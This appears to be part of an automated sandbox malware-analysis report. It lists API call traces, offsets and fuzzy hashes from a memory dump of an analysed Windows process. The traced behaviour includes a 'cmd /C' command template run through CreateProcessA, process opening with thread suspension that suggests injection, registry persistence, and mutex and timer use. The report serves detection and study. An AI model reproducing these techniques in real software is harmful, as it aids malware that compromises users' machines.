  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
